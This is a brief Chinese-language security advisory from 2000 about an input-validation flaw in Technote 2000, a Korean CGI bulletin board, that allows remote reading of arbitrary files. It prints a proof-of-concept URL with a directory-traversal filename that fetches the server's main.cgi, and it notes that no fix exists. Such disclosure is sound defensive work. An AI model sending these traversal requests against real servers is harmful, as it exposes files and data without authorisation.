korea cgi公告版technote存在安全漏洞发布时间:2000-12-28 更新时间:2000-12-27 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 technote 2000详细描述 technote是韩国有名的CGI公告版程序,其中由于对输入缺少正确的检查,可以导致显示任意文件内容。 测试代码 http://localhost/technote/main.cgi/oops?board=FREE_BOARD&command= down_load&filename=/../../../main.cgi 其中FREE_BOARD是一个默认的DB数据库。 解决方案 尚无 相关信息 |